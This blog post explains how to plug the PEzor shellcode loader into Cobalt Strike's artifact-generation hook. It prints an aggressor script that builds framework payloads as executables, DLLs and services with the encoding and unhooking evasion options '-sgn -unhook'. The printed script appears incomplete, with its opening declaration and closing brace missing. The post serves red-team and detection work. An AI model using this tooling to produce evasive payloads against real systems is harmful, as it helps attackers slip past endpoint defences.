
phra's blog ~ Technical posts about InfoSec

Feb 17, 2021

Generating Custom Cobalt Strike Artifacts with PEzor

Let’s continue our journey with Cobalt Strike and PEzor by integrating it via Aggressor Scripts’ Hooks in order to produce custom artifacts that will be seamlessly used by the framework when generating payloads on the fly.

PEzor v2.1.0


When implementing the execute-inmemory functionality, described in the previous post, I had to implement a custom Sleep subroutine to convert the provided executable into a Reflective DLL or a .NET assembly. But wouldn’t it be nice if we can reuse a similar mechanism in order to build custom artifacts used by built-in and post-exploitation modules?

Aggressor Scripts’ Hooks

The Cobalt Strike framework exposes APIs to developers for integrating custom, external tooling within its payload generation flow. In particular, we are interested in the EXECUTABLE_ARTIFACT_GENERATOR hook since we want to customize binary artifacts generated by the framework when executing post-exploitation modules. By overriding the default internal behaviour, we are able to customize the artifacts in a completely trasparent way so that existing aggressor scripts using the artifact_payload and artifact_stager functions will continue to work as expected while benefiting of functionalities provided by external tooling.

Source Code

By checking out the source of the official Artifact Kit, we can understand how to override the default behaviour by declaring the EXECUTABLE_ARTIFACT_GENERATOR hook. The framework is invoking the code associated with the hook by passing in two arguments:

Since we are integrating a fully featured shellcode loader that implements all the required output formats of the framework, we can entirely skip using the official Artifact Kit by employing our own templates. (in this case the ones shipped with PEzor)

Here’s the main source code of the hook:


# Artifact Kit Integration Script

# Windows Executables and DLLs
# Arguments
# 	$1 = artifact file (e.g., artifact32.exe)
# 	$2 = shellcode
# Return 
#	our generated artifact
	local('$opts $format $payload $resource $tmpfile');

	($resource, $payload) = @_;

	$tmpfile = get_random_temp_filename();
	write_file($tmpfile, $payload);
	$opts = "-sgn -unhook";

	if ($resource eq "artifact32big.dll") {
		$format = "-32 -format=dll";
	} else if ($resource eq "artifact32.dll") {
		$format = "-32 -format=dll";
	} else if ($resource eq "artifact32big.exe") {
		$format = "-32 -format=exe";
	} else if ($resource eq "artifact32.exe") {
		$format = "-32 -format=exe";
	} else if ($resource eq "artifact32svcbig.exe") {
		$format = "-32 -format=service-exe";
	} else if ($resource eq "artifact32svc.exe") {
		$format = "-32 -format=service-exe";
	} else if ($resource eq "artifact64big.exe") {
		$format = "-64 -format=exe";
	} else if ($resource eq "artifact64big.x64.dll") {
		$format = "-64 -format=dll";
	} else if ($resource eq "artifact64.exe") {
		$format = "-64 -format=exe";
	} else if ($resource eq "artifact64svcbig.exe") {
		$format = "-64 -format=service-exe";
	} else if ($resource eq "artifact64svc.exe") {
		$format = "-64 -format=service-exe";
	} else if ($resource eq "artifact64.x64.dll") {
		$format = "-64 -format=dll";

	return read_file(execute_PEzor("$format $opts $tmpfile"));

As we can see from the source, we are simply mapping the filenames used internally to PEzor command line options in order to generate the artifact in the appropriate output format. The complete, updated aggressor scripts can be found in the /aggressor folder on the PEzor repository.